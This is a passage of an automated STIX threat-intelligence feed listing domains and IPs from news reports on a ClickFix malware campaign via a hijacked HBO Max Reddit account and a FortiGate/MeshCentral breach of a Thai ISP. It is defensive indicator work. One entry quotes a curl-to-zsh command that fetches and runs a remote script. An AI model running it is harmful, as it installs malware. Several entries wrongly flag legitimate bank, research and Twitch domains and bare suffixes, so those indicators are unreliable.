News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5e46c03d-ae83-4c99-b6f1-ca577bdc56f1","created":"2026-09-15T05:31:05.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: opusaccel.top","description":"Seen in \"China-Linked Hackers Exploit Chrome-Windows Zero-Day Chain to Deploy GRIMWEDGE\" (The Hacker News). Context: and loop that polls a command-and-control (C2) server (\"ocr.opusaccel[.]top\") to receive further instructions that are then executed","pattern":"[domain-name:value = 'opusaccel.top']","pattern_type":"stix","valid_from":"2026-09-15T05:31:05.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/china-linked-hackers-exploit-chrome.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--fe7b05f0-317b-45b8-8007-0b100e8240aa","created":"2026-09-15T05:22:02.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: code-desktop.com","description":"Seen in \"HBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware\" (GBHackers). Context: promoting a fake macOS disk-cleaning service, 11 using the code-desktop[.]com theme, and six directing users to hbomax-macos[.]com . Th","pattern":"[domain-name:value = 'code-desktop.com']","pattern_type":"stix","valid_from":"2026-09-15T05:22:02.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hbo-max-reddit-account-hijacked/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1b17327f-29b9-40c3-8137-b0b9911ddcac","created":"2026-09-15T05:22:02.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: codex-craft.com","description":"Seen in \"HBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware\" (GBHackers). Context: inting to hbomaxx[.]app , 36 tied to the developer-oriented codex-craft[.]com , 15 promoting a fake macOS disk-cleaning service, 11 usi","pattern":"[domain-name:value = 'codex-craft.com']","pattern_type":"stix","valid_from":"2026-09-15T05:22:02.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hbo-max-reddit-account-hijacked/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--67b62dc2-b794-40d3-95bb-20ef11134795","created":"2026-09-15T05:22:02.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: hbomax-macos.com","description":"Seen in \"HBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware\" (GBHackers). Context: ng the code-desktop[.]com theme, and six directing users to hbomax-macos[.]com . The mix shows that the operators were targeting both en","pattern":"[domain-name:value = 'hbomax-macos.com']","pattern_type":"stix","valid_from":"2026-09-15T05:22:02.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hbo-max-reddit-account-hijacked/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3d9c416b-1ae5-4442-a20d-59d7c1cfc1f5","created":"2026-09-15T05:22:02.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: hbomaxx.app","description":"Seen in \"HBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware\" (GBHackers). Context: al lure categories, including 40 advertisements pointing to hbomaxx[.]app , 36 tied to the developer-oriented codex-craft[.]com , 1","pattern":"[domain-name:value = 'hbomaxx.app']","pattern_type":"stix","valid_from":"2026-09-15T05:22:02.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hbo-max-reddit-account-hijacked/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4e5c7e17-1336-439a-90c7-381aed111405","created":"2026-09-15T05:22:02.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: hbomaxx.us","description":"Seen in \"HBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware\" (GBHackers). Context: cted to counterfeit HBO Max-themed landing pages, including hbomaxx[.]us . Rather than serving a conventional installer, the site","pattern":"[domain-name:value = 'hbomaxx.us']","pattern_type":"stix","valid_from":"2026-09-15T05:22:02.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hbo-max-reddit-account-hijacked/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b519c473-d288-44f5-a17a-6864c88713f6","created":"2026-09-15T05:22:02.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"ipv4: 164.90.161.147","description":"Seen in \"HBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware\" (GBHackers). Context: lemetry and /contact exfiltration September macOS execution 164.90.161.147:80 September macOS Post-execution HTTP contact September ma","pattern":"[ipv4-addr:value = '164.90.161.147']","pattern_type":"stix","valid_from":"2026-09-15T05:22:02.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hbo-max-reddit-account-hijacked/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--009f7f5d-c890-4b8e-a0c1-cfc7ca8cced6","created":"2026-09-15T05:22:02.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"ipv4: 165.22.199.85","description":"Seen in \"HBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware\" (GBHackers). Context: rect-to-IP TLS C2 using facebook.com SNI Exact PE execution 165.22.199.85 September macOS Telemetry and /contact exfiltration Septemb","pattern":"[ipv4-addr:value = '165.22.199.85']","pattern_type":"stix","valid_from":"2026-09-15T05:22:02.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hbo-max-reddit-account-hijacked/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1944b43e-63fc-4c7f-b84e-b46ab52988c3","created":"2026-09-15T05:22:02.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"ipv4: 45.94.47.204","description":"Seen in \"HBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware\" (GBHackers). Context: omains. Indicators of Compromise Address Branch Role Source 45.94.47.204:80 AMOS helper Enrollment, task polling, and acknowledgemen","pattern":"[ipv4-addr:value = '45.94.47.204']","pattern_type":"stix","valid_from":"2026-09-15T05:22:02.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hbo-max-reddit-account-hijacked/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d7fb3b00-9108-4f61-81fe-202bd4d9ec5b","created":"2026-09-15T05:22:02.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"ipv4: 77.91.65.13","description":"Seen in \"HBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware\" (GBHackers). Context: nd-and-control technique in which Amatera communicated with 77.91.65.13:443 while presenting facebook.com in TLS SNI and HTTP autho","pattern":"[ipv4-addr:value = '77.91.65.13']","pattern_type":"stix","valid_from":"2026-09-15T05:22:02.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hbo-max-reddit-account-hijacked/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--94da1ed3-dee4-4212-be58-d314f189f362","created":"2026-09-15T05:20:47.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: ayuthayatech.com","description":"Seen in \"Hackers Exploit FortiGate SSL-VPN Flaw to Breach Thai ISP and Deploy MeshCentral Backdoor\" (GBHackers). Context: fied a device group named TH-3BB and directed agents to www.ayuthayatech[.]com, using the MeshCentral WebSocket endpoint /agent.ashx. A","pattern":"[domain-name:value = 'ayuthayatech.com']","pattern_type":"stix","valid_from":"2026-09-15T05:20:47.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hackers-exploit-fortigate-ssl-vpn-flaw/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--018b6521-3ee1-4b8e-80bc-75c3653c2277","created":"2026-09-15T05:20:47.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: co.th","description":"Seen in \"Hackers Exploit FortiGate SSL-VPN Flaw to Breach Thai ISP and Deploy MeshCentral Backdoor\" (GBHackers). Context: focused on the FortiGate 60F SSL-VPN appliance at mail.3bb.co[.]th:10443. Scripts named forti1.sh through forti8.sh performe","pattern":"[domain-name:value = 'co.th']","pattern_type":"stix","valid_from":"2026-09-15T05:20:47.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hackers-exploit-fortigate-ssl-vpn-flaw/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0773994b-d878-4600-a340-7c8fbef31189","created":"2026-09-15T05:20:47.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: hunt.io","description":"Seen in \"Hackers Exploit FortiGate SSL-VPN Flaw to Breach Thai ISP and Deploy MeshCentral Backdoor\" (GBHackers). Context: 10.11.152[.]4:8009 using CVE-2020-1938, known as Ghostcat. Hunt.io reported evidence of root-level command execution on a comp","pattern":"[domain-name:value = 'hunt.io']","pattern_type":"stix","valid_from":"2026-09-15T05:20:47.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hackers-exploit-fortigate-ssl-vpn-flaw/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2daf7dd0-69d9-4abc-b1b4-f5e20933ec25","created":"2026-09-15T05:20:47.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: triplet.co","description":"Seen in \"Hackers Exploit FortiGate SSL-VPN Flaw to Breach Thai ISP and Deploy MeshCentral Backdoor\" (GBHackers). Context: ernal 10.11.x.x environment and systems associated with the triplet.co.th domain. Recovered network configuration data suggested t","pattern":"[domain-name:value = 'triplet.co']","pattern_type":"stix","valid_from":"2026-09-15T05:20:47.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hackers-exploit-fortigate-ssl-vpn-flaw/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3913b1d4-0a9c-4373-8a97-c12b669fc4d4","created":"2026-09-15T00:00:00.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: abchina.com","description":"Seen in \"Tajin Group: Guarantee Marketplace Vendor Involved in Phishing and Chinese Money Laundering Group\" (Recorded Future). Context: .]com ) ABC/Agricultural Bank: Agricultural Bank of China ( abchina[.]com ) CCB: China Construction Bank ( ccb[.]com ) Rural Credit","pattern":"[domain-name:value = 'abchina.com']","pattern_type":"stix","valid_from":"2026-09-15T00:00:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Recorded Future","url":"https://www.recordedfuture.com/research/tajin-group-gurantee-marketplace"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2ae648ab-9795-4040-97c1-0151b6ecba68","created":"2026-09-15T00:00:00.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: ccb.com","description":"Seen in \"Tajin Group: Guarantee Marketplace Vendor Involved in Phishing and Chinese Money Laundering Group\" (Recorded Future). Context: k of China ( abchina[.]com ) CCB: China Construction Bank ( ccb[.]com ) Rural Credit Cooperatives: a cooperative or credit unio","pattern":"[domain-name:value = 'ccb.com']","pattern_type":"stix","valid_from":"2026-09-15T00:00:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Recorded Future","url":"https://www.recordedfuture.com/research/tajin-group-gurantee-marketplace"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--73e3381d-18b8-46b3-a116-834ca0448e03","created":"2026-09-15T00:00:00.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: com.cn","description":"Seen in \"Tajin Group: Guarantee Marketplace Vendor Involved in Phishing and Chinese Money Laundering Group\" (Recorded Future). Context: Note: ICBC: Industrial and Commercial Bank of China ( icbc.com[.]cn ) Lanzhou: Bank of Lanzhou ( lzbank[.]com ) ABC/Agricultu","pattern":"[domain-name:value = 'com.cn']","pattern_type":"stix","valid_from":"2026-09-15T00:00:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Recorded Future","url":"https://www.recordedfuture.com/research/tajin-group-gurantee-marketplace"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e23d69a7-d80b-4827-b998-327361a596e7","created":"2026-09-15T00:00:00.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: lzbank.com","description":"Seen in \"Tajin Group: Guarantee Marketplace Vendor Involved in Phishing and Chinese Money Laundering Group\" (Recorded Future). Context: Bank of China ( icbc.com[.]cn ) Lanzhou: Bank of Lanzhou ( lzbank[.]com ) ABC/Agricultural Bank: Agricultural Bank of China ( abc","pattern":"[domain-name:value = 'lzbank.com']","pattern_type":"stix","valid_from":"2026-09-15T00:00:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Recorded Future","url":"https://www.recordedfuture.com/research/tajin-group-gurantee-marketplace"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0fe28bce-157a-4979-a4c6-5fb20998b553","created":"2026-09-14T22:43:01.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: clean-disk-guide.com","description":"Seen in \"HBO Max Reddit account compromised to serve ClickFix attacks\" (The Register · Security). Context: Of the rest: 15 purported to be a macOS disk utility (apple.clean-disk-guide[.]com) and 11 used other developer tools as lures (code-desktop","pattern":"[domain-name:value = 'clean-disk-guide.com']","pattern_type":"stix","valid_from":"2026-09-14T22:43:01.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Register · Security","url":"https://www.theregister.com/cyber-crime/2026/09/14/hbo-max-reddit-account-compromised-to-serve-clickfix-attacks/5296408"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7d2823ee-d6bd-4329-bc70-ae532ae8eb9c","created":"2026-09-14T22:43:01.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: code-desktop.com","description":"Seen in \"HBO Max Reddit account compromised to serve ClickFix attacks\" (The Register · Security). Context: sk-guide[.]com) and 11 used other developer tools as lures (code-desktop[.]com). “The campaign proves once again why trusted distributio","pattern":"[domain-name:value = 'code-desktop.com']","pattern_type":"stix","valid_from":"2026-09-14T22:43:01.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Register · Security","url":"https://www.theregister.com/cyber-crime/2026/09/14/hbo-max-reddit-account-compromised-to-serve-clickfix-attacks/5296408"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d8d37787-c383-4c8b-8109-e4a36500027d","created":"2026-09-14T22:43:01.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: codex-craft.com","description":"Seen in \"HBO Max Reddit account compromised to serve ClickFix attacks\" (The Register · Security). Context: trick prospective victims via an OpenAI Codex theme (with a codex-craft[.]com) landing page. Of the rest: 15 purported to be a macOS di","pattern":"[domain-name:value = 'codex-craft.com']","pattern_type":"stix","valid_from":"2026-09-14T22:43:01.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Register · Security","url":"https://www.theregister.com/cyber-crime/2026/09/14/hbo-max-reddit-account-compromised-to-serve-clickfix-attacks/5296408"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--64ce1452-450f-492b-98bd-59965dc56bff","created":"2026-09-14T22:43:01.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: hbomax-macos.com","description":"Seen in \"HBO Max Reddit account compromised to serve ClickFix attacks\" (The Register · Security). Context: Max lure, directing app seekers to either hbomaxx[.]app or hbomax-macos[.]com. Another 36 tried to trick prospective victims via an Ope","pattern":"[domain-name:value = 'hbomax-macos.com']","pattern_type":"stix","valid_from":"2026-09-14T22:43:01.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Register · Security","url":"https://www.theregister.com/cyber-crime/2026/09/14/hbo-max-reddit-account-compromised-to-serve-clickfix-attacks/5296408"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6a7b9068-fda1-4a7f-99b1-1cdfb268826f","created":"2026-09-14T22:43:01.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: hbomaxx.app","description":"Seen in \"HBO Max Reddit account compromised to serve ClickFix attacks\" (The Register · Security). Context: s, 46 used an HBO Max lure, directing app seekers to either hbomaxx[.]app or hbomax-macos[.]com. Another 36 tried to trick prospect","pattern":"[domain-name:value = 'hbomaxx.app']","pattern_type":"stix","valid_from":"2026-09-14T22:43:01.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Register · Security","url":"https://www.theregister.com/cyber-crime/2026/09/14/hbo-max-reddit-account-compromised-to-serve-clickfix-attacks/5296408"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--927d21d1-5864-457f-bf95-f87d4cf39b67","created":"2026-09-14T22:43:01.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: hbomaxx.us","description":"Seen in \"HBO Max Reddit account compromised to serve ClickFix attacks\" (The Register · Security). Context: n be taken to a “somewhat-legitimate” looking landing page (hbomaxx[.]us) that includes a join/download button. REG AD Clicking th","pattern":"[domain-name:value = 'hbomaxx.us']","pattern_type":"stix","valid_from":"2026-09-14T22:43:01.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Register · Security","url":"https://www.theregister.com/cyber-crime/2026/09/14/hbo-max-reddit-account-compromised-to-serve-clickfix-attacks/5296408"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--65d55064-0fd0-485e-9e24-1a91c22f110b","created":"2026-09-14T19:03:51.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: ttvnw.net","description":"Seen in \"Twitch extension with 30K installs exposes users’ OAuth tokens\" (BleepingComputer). Context: tension redirects Twitch’s video playlist request (to usher.ttvnw[.]net ) through that proxy, it appends the token as an &auth= q","pattern":"[domain-name:value = 'ttvnw.net']","pattern_type":"stix","valid_from":"2026-09-14T19:03:51.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/twitch-extension-with-30k-installs-exposes-users-oauth-tokens/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b7ccaada-8088-400a-857e-d9721ea7de07","created":"2026-09-14T18:34:16.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: clean-disk-guide.com","description":"Seen in \"Hackers hijack HBO Max Reddit account to push malware in ClickFix ads\" (BleepingComputer). Context: AI and developer site codex-craft[.]com, 15 promoting apple.clean-disk-guide[.]com, 11 pointing to code-desktop[.]com, and six promoting hbo","pattern":"[domain-name:value = 'clean-disk-guide.com']","pattern_type":"stix","valid_from":"2026-09-14T18:34:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/hackers-hijack-hbo-max-reddit-account-to-push-malware-in-clickfix-ads/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--465ca929-56a1-4545-bab0-c02fc9afd9dd","created":"2026-09-14T18:34:16.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: code-desktop.com","description":"Seen in \"Hackers hijack HBO Max Reddit account to push malware in ClickFix ads\" (BleepingComputer). Context: , 15 promoting apple.clean-disk-guide[.]com, 11 pointing to code-desktop[.]com, and six promoting hbomax-macos[.]com. This allowed the a","pattern":"[domain-name:value = 'code-desktop.com']","pattern_type":"stix","valid_from":"2026-09-14T18:34:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/hackers-hijack-hbo-max-reddit-account-to-push-malware-in-clickfix-ads/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--417f75fb-4a2d-4ec6-8f21-798b6c41cec2","created":"2026-09-14T18:34:16.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: codex-craft.com","description":"Seen in \"Hackers hijack HBO Max Reddit account to push malware in ClickFix ads\" (BleepingComputer). Context: hbomaxx[.]app, 36 promoting the fake AI and developer site codex-craft[.]com, 15 promoting apple.clean-disk-guide[.]com, 11 pointing t","pattern":"[domain-name:value = 'codex-craft.com']","pattern_type":"stix","valid_from":"2026-09-14T18:34:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/hackers-hijack-hbo-max-reddit-account-to-push-malware-in-clickfix-ads/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--26761559-5f1c-42a9-81ae-46c8f3f2644b","created":"2026-09-14T18:34:16.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: ember-bridge.com","description":"Seen in \"Hackers hijack HBO Max Reddit account to push malware in ClickFix ads\" (BleepingComputer). Context: lowing command: export _watch_v2=97d9d8dc;curl -sL \"https://ember-bridge[.]com/curl/a44a37519au/setup.sh\"| zsh Hudson Rock noted ember-b","pattern":"[domain-name:value = 'ember-bridge.com']","pattern_type":"stix","valid_from":"2026-09-14T18:34:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/hackers-hijack-hbo-max-reddit-account-to-push-malware-in-clickfix-ads/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b78bfdf7-d456-4ef3-a517-82ecfae098dd","created":"2026-09-14T18:34:16.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: hbomax-macos.com","description":"Seen in \"Hackers hijack HBO Max Reddit account to push malware in ClickFix ads\" (BleepingComputer). Context: .]com, 11 pointing to code-desktop[.]com, and six promoting hbomax-macos[.]com. This allowed the attackers to target a larger audience t","pattern":"[domain-name:value = 'hbomax-macos.com']","pattern_type":"stix","valid_from":"2026-09-14T18:34:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/hackers-hijack-hbo-max-reddit-account-to-push-malware-in-clickfix-ads/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--868bfc81-0e47-4c31-a89e-da139ab06416","created":"2026-09-14T18:34:16.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: hbomaxx.app","description":"Seen in \"Hackers hijack HBO Max Reddit account to push malware in ClickFix ads\" (BleepingComputer). Context: ddit account. The researchers identified 40 ads pointing to hbomaxx[.]app, 36 promoting the fake AI and developer site codex-craft[","pattern":"[domain-name:value = 'hbomaxx.app']","pattern_type":"stix","valid_from":"2026-09-14T18:34:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/hackers-hijack-hbo-max-reddit-account-to-push-malware-in-clickfix-ads/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5fd7a5aa-7725-4c57-87b9-ebd1dcb1dd6d","created":"2026-09-14T18:34:16.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: hbomaxx.us","description":"Seen in \"Hackers hijack HBO Max Reddit account to push malware in ClickFix ads\" (BleepingComputer). Context: Max subreddits,\" warned the user . \"The advert takes you to hbomaxx[.]us which looks somewhat legitimate, and has a join button /","pattern":"[domain-name:value = 'hbomaxx.us']","pattern_type":"stix","valid_from":"2026-09-14T18:34:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/hackers-hijack-hbo-max-reddit-account-to-push-malware-in-clickfix-ads/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--33597dd2-c4f6-40a9-9ee8-9f38d11fa33c","created":"2026-09-14T18:01:49.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: agent.3bb.co","description":"Seen in \"3BB Attacker Used MeshCentral Backdoor for Root Access, Targeted Subscriber Credentials\" (The Hacker News). Context: eshagent/ Targets: mail.3bb.co[.]th (FortiGate SSL-VPN) and agent.3bb.co[.]th (internal portal) The full list of indicators, along w","pattern":"[domain-name:value = 'agent.3bb.co']","pattern_type":"stix","valid_from":"2026-09-14T18:01:49.000Z","labels":["auto-extracted","breach"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/3bb-attacker-used-meshcentral-backdoor.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--93f584ca-40cd-476b-b6b4-8baf06fc861c","created":"2026-09-14T18:01:49.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: ayuthayatech.com","description":"Seen in \"3BB Attacker Used MeshCentral Backdoor for Root Access, Targeted Subscriber Credentials\" (The Hacker News). Context: reporting to a control server that the attacker ran at www.ayuthayatech[.]com, under a device group named TH-3BB . Attackers increasing","pattern":"[domain-name:value = 'ayuthayatech.com']","pattern_type":"stix","valid_from":"2026-09-14T18:01:49.000Z","labels":["auto-extracted","breach"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/3bb-attacker-used-meshcentral-backdoor.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--87dcf860-c4f5-4a35-a311-2434e498c76d","created":"2026-09-14T18:01:49.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: co.th","description":"Seen in \"3BB Attacker Used MeshCentral Backdoor for Root Access, Targeted Subscriber Credentials\" (The Hacker News). Context: s over SSH, probed 3BB's internal sales portal at agent.3bb.co[.]th, and searched compromised machines for stored passwords,","pattern":"[domain-name:value = 'co.th']","pattern_type":"stix","valid_from":"2026-09-14T18:01:49.000Z","labels":["auto-extracted","breach"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/3bb-attacker-used-meshcentral-backdoor.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8d7adb5b-f2e7-446e-b1e9-2ed864b4b2a7","created":"2026-09-14T18:01:49.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: hunt.io","description":"Seen in \"3BB Attacker Used MeshCentral Backdoor for Root Access, Targeted Subscriber Credentials\" (The Hacker News). Context: tacker's commands, and add SSH keys as backup ways back in. Hunt.io said the attacker's main goal was 3BB's subscriber data. Sc","pattern":"[domain-name:value = 'hunt.io']","pattern_type":"stix","valid_from":"2026-09-14T18:01:49.000Z","labels":["auto-extracted","breach"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/3bb-attacker-used-meshcentral-backdoor.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--82b7faf2-d5f3-4cca-aa86-8ed9f81e94ba","created":"2026-09-14T17:08:51.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: ayuthayatech.com","description":"Seen in \"Hackers Exploit FortiGate SSL-VPN Vulnerability to Attack Broadband Provider\" (Cyber Security News). Context: s to a device group named TH-3BB and directed agents to www.ayuthayatech[.]com over port 443. A devices.json export listed multiple 